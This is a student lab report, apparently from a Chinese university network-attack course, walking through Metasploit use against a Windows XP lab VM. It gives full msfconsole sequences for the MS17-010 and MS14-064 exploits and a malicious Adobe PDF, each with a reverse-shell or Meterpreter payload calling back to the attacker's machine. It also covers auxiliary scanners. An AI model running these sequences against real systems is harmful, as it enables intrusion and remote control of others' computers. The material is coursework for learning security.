2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用
实验目标
- 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
- 一个主动攻击实践,如ms08-067; (1分)
ms17_010_psexec(√) 不唯一
- 一个针对浏览器的攻击,如ms11-050;(1分)
ms14_064_ole_lode_execution(√)不唯一
- 一个针对客户端的攻击,如Adobe;(1分)
adobe_geticon(√) 唯一
- 成功应用任何一个辅助模块。(0.5分)
scanner/http/ssl_version(√)不唯一
scanner/portscan/tcp (√)不唯一
scanner/oracle/tnslsnr_version (√)唯一
- 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。
Exp 5.1 一个主动攻击实践-ms17-010
- 攻击机:Kali(IP地址:192.168.153.135)
- 靶机: windows XP(IP地址:192.168.153.136)
msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > show payloads
msf exploit(windows/smb/ms17_010_psexec) > set payload generic/shell_reverse_tcp //tcp反向回连
msf exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.153.135 //攻击机ip
msf exploit(windows/smb/ms17_010_psexec) > set LPORT 5237 //攻击端口
msf exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.153.136 //靶机ip,特定漏洞端口已经固定
msf exploit(windows/smb/ms17_010_psexec) > run //攻击


- 攻击成功如下:

Exp 5.2 对浏览器的攻击 ms14_064
- 攻击机:Kali(IP地址:192.168.153.135)
- 靶机: windows XP(IP地址:192.168.153.136)
msfconsole
msf > use windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reverse_tcp //http反向回连
set LHOST 192.168.153.135//攻击机ip
set Lport 5237//攻击端口固定
exploit //攻击
可以看到生成的一个URL:http://192.168.153.135:8080/YT1IHT

在XP的IE上点开后:

回到Kali,查看sessions,输入sessions -i 4后,发现攻击成功,获得shell功能

Exp 5.3 针对Adobe Reader软件的渗透攻击-adobe-geticon
- 攻击机:Kali(IP地址:192.168.153.135)
- 靶机: windows XP(IP地址:192.168.153.136)
-依次输入以下指令:
search Adobe
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.153.135
set LPORT 5237
set filename 20165237.pdf
exploit


找到pdf文件(要打开显示隐藏文件选项)
接着输入以下代码
back
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.153.135
set LPORT 5237
exploit
接着在xp中点开pdf文件,回到kali,发现回传了一些东西。



查看sessions,输入session -i 1,发现攻击成功,可以使用shell。

Exp 5.4 辅助功能攻击-tcp+ssl_version+tnslsnr_version
攻击机:Kali(IP地址:192.168.153.135)
靶机: windows XP(IP地址:192.168.153.136)
输入search auxiliary
选择其中一个进行使用(其实我试了很多,成功的也挺多,但是和之前的人重复,所以我就多用了几个,可能会重复,但是我觉得效果很好)
tcp扫描成功:


ssl版本模块扫描成功:


OracleSQL的监听服务攻击成功:

实验感想和问题
- 用自己的话解释什么是exploit,payload,encode?
exploit:针对靶机的漏洞,利用靶机中的后门,对靶机进行攻击。
payload:可以实现任何运行在受害者环境中的程序所能做的事情,并且能够执行动作包括破坏文件删除文件,向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。说白了就是传送到靶机上的用来攻击的恶意代码。
encode:对payload进行编码
离实战还缺些什么技术或步骤?
1、在实践中发现MSF攻击的局限性很大,其中的漏洞几乎都是针对win XP系统,而实际应用的系统大部分是win7及以上的系统,如果需要实战攻击win7及以上的系统,还需要不断发现并成功利用新的漏洞。
2、需要提高扫描等信息收集技术,信息收集是做攻击的重要前提,但大多数初级的扫描都会被win7及以上的系统发现甚至拒绝,所以提供相应的技术很重要。感想:
这次实验花费了很多时间去查找能攻击成功的漏洞,但是让我对于msf更加熟练,甚至更加崇拜,希望以后能够使用它更多的领域。
2018-2019 20165237网络对抗 Exp5 MSF基础应用的更多相关文章
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
- 2018-2019 20165220 网络对抗 Exp5 MSF基础
实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...
- 2018-2019 20165219 网络对抗 Exp5 MSF基础
实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...
- 20145338 《网络对抗》 MSF基础应用
20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...
- 20145308 《网络对抗》 MSF基础应用 学习总结
20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...
- 20145326蔡馨熤《网络对抗》——MSF基础应用
20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...
- 20155218《网络对抗》MSF基础应用
20155218<网络对抗>MSF基础应用 实验过程 1.一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞: show target 查看可以 ...
- 20155304《网络对抗》MSF基础应用
20155304<网络对抗>MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_ ...
随机推荐
- asp.net core 2.2 中的过滤器/筛选器(上)
ASP.NET Core中的过滤器/筛选器 通过使用 ASP.NET Core MVC 中的筛选器,可在请求处理管道中的特定阶段之前或之后运行代码. 注意:本主题不适用于 Razor 页面. ASP. ...
- Asp.Net Core中DI的知识总结
在asp.net core中DI的概念是由这几部分组成的: IServiceCollection,保存IServiceDescriptor实例的列表 IServiceProvider,只有一个方法Ge ...
- Python------Mongodb操作
Python3要操作Mongodb需要下载pymongo,Linux下获取pymongo的方法也比较简单,控制台输入命令:sudo pip3 install pymongo 即可. Pymongo的文 ...
- React Fullpage
之前项目需要,单独拿出来做了个demo 目前仅支持收尾加autoheight github地址:https://github.com/zlinggnilz/React-Fullpage
- 树莓派3B+(三)
上一篇中,我们配置好了基本的raspbain系统,接下来我们可以用xrdp或者vnc在Windows上远程连接树莓派. 一.安装xrdp xrdp和vnc是两种常见的远程桌面协议,可以进行可视化界面远 ...
- js打开新窗口,打开新窗口屏蔽工具栏和地址栏,窗口按规定大小显示
opener=null; window.open ("http://baidu.com", "newwindow", "height=500, wid ...
- THUWC2019滚粗记
Day-1 今年年初,留坑,以后补,多多关注. Day0 上午吃了碗粉,就坐地铁到了高铁站. 做高铁从长沙到了广州,最大的感受就是热热热热热热热热. 所以太热了不说了.(雾 汉堡王真香 Day1 上午 ...
- react 生命周期函数介绍
constructor():构造函数 执行:组件加载钱最先调用一次,仅调用一次. 作用:定义状态机变量. 注意:第一个语句必须为super(), 否则会报错:'this' is not allowed ...
- Linux sed command
概述 sed 是一种在线非交互式编辑器,它一次处理一行内容. 处理时,把当前处理的行存储在临时缓冲区中,称为"模式空间"(pattern space). 接着用sed命令处理缓冲区 ...
- Java:IO流-流的操作规律和转换流
首先我们先来了解一些IO流基本知识. 一,基本知识概括 具体的IO流有很多种,针对不同的应用场景应该使用相应的流对象.但怎么确定应该使用哪个IO流对象呢? 一般要有四个明确: 1)明确源和目的 源:I ...